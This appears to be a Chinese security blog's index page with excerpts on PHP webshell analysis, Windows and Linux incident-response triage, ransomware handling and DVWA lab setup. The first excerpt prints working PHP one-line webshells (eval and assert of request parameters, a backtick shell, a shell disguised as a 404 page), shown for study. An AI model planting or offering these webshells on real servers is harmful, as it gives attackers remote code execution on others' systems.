DropAnn

整理汇总网络上常见的php_webshell进行学习分析。提升作为web狗的修养hhhhh mua😘分类一句话木马1<?php @eval($_POST['pass']); ?> eval : PHP 4, PHP 5, PHP 7+ 均可用，接受一个参数，将字符串作为 PHP 代码执行 1<?php assert($_REQUEST["pass"]);?> assert: PHP 4, PHP 5, PHP 7.2 以下均可用，一般接受一个参数，php 5.4.8 版本后可以接受两个参数 1<?=`$_GET[1]`; 最短一句话 404.php，利用404隐藏一句话123456789101112<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><bo ...

我非常赞同曾经看到的一句话，一旦你能够确定本次安全事件的类型，猜测出攻击者或者恶意代码的攻击思路，然后去验证排查这些猜想，就会加速你的分析过程。在做应急溯源的过程中，很多时候通过一两点线索，拼凑攻击者链条的画像，用下文提到的排查方法，去补充证据来证明自己的猜想。（正如打游戏要预判敌人走位，应急也要预判攻击者的行为）当然受限于自己知识的局限性还是很可能误判的，在应急中误判又是特别致命的，可能一个误操作就会为客户带来不可估量的损失。所以我个人认为现场溯源应急至少要3个人以上，互相弥补吧。 系统基本信息系统信息概述 1systeminfo 详细信息 1msinfo32 显示本地计算机硬件资源、组件、软件环境；正在运行的任务，服务、驱动、加载模块、启动程序 正在运行的任务 服务 驱动程序 加载的模块 启动程序 系统账号（用户信息）预判攻击者利用账号的可能性： 直接建立新账号（可能和系统常用名类似） 激活系统中默认账号（这个账号存在很久不经常使用） 创建隐藏账号（账户名后$） 命令行1net user 查看具体账号的详细信息，username为具体用户名 1net user ...

勒索病毒，是一种特殊的恶意软件，又被人归类为“阻断访问式攻击”（denial-of-access attack），其与其他病毒最大的不同在于手法以及中毒方式。其中一种勒索软件仅是单纯地将受害者的电脑锁起来，而另一种则系统性地加密受害者硬盘上的文件。所有的勒索软件都会要求受害者缴纳赎金以取回对电脑的控制权，或是取回受害者根本无从自行获取的解密密钥以便解密文件。勒索软件通常透过木马病毒的形式传播，将自身为掩盖为看似无害的文件，通常会通过假冒成普通的电子邮件等社会工程学方法欺骗受害者点击链接下载，但也有可能与许多其他蠕虫病毒一样利用软件的漏洞在联网的电脑间传播。本文重点放在一线人员如何处置勒索病毒，溯源攻击方法。 常规处置方法 错误处置： 使用u盘，硬盘等移动存储设备，挂载共享盘等存储服务。 多次对被勒索后的文件进行解密操作，可能破坏原始文件降低解密的可能性。 隔离被感染主机/服务器 断网，断电（断网>断电） 对网络资源访问控制权限做严格认证和控制 确认勒索病毒种类确认勒索病毒名称，家族查看是否有解密的可能性病毒查询网站腾讯勒索病毒搜索引擎 360勒索病毒解密 奇安信勒索病毒搜索引 ...

本文是针对应急响应中linux排查思路做一个固化（其实是在客户现场发呆😐也不好），方便自己能够快速排查linux中的问题，溯源攻击方法。主要包含（系统、网络、进程、启动项、服务、文件痕迹等信息）其中还有内存分析，日志分析，流量分析等，新开文章进行总结。 易丢失数据系统信息1234567891011121314151617181920212223# 真实时间date -R# 查看Linux内核版本uname -a# 列出目前与过去登录系统的用户相关信息last# 观察硬盘实体使用情况fdisk -l# 查看挂载mount# 查看内存more /proc/meminfo > memoryinfo.log# 查看mac地址信息cat /etc/udev/rules.d/70-persistent-net.rules# CPU基础信息lscpu 网络连接1234yum install net-tools [On CentOS/RHEL]apt install net-tools [On Debian/Ubuntu]zypper install net-tools [ ...

c157c9744e0298d00173c08a9dbffe0ec94f198c43dd2b95a3c3b526c19ab930fc2f626e403ff6be879321602af979fcefe222908fade7e040cdb328580fffef39bc951b3dfa22c575df45c74428be1a3b02f350a45f5b6fa67ba5446f594ac4bcc4ee39e2513dc65a3a4cdac066255cf3707b773f51d2885df2f2a4c75aff7dcde8f84552e7ab0bc1ab73c77d91cc1e250adcb5ddc3fa9dac5af68bff2444d24d92cbf3b110036fb14fbc32b81071c7f9559d7d8002be86de2f1aebd9b7cc3f413e27f64e7ac4ed7748d15ee6cd9fbce430fb3da21a03e18c4dd820a3ae7b90b56871695849fbbc12aca3f11c0765d2444efb80dea393453 ...

centos7部署DVWA创建数据库和dvwa用户，设置远程访问123create database dvwa;grant all on dvwa.* to dvwa@'%' identified by 'dvwa12345';flush privileges; 安装apache+php，启动httpd123yum -y install apache2 php php-mysqli php-gd libapache2-mod-phpsystemctl start httpdsystemctl enable httpd 验证php1echo -e "<?php\nphpinfo();\n?>" > /var/www/html/phpinfo.php 开放防火墙 12firewall-cmd --add-port=80/tcp --permanentfirewall-cmd --reload 部署dvwa1234567cd /var/www/html/git clone https://github.co ...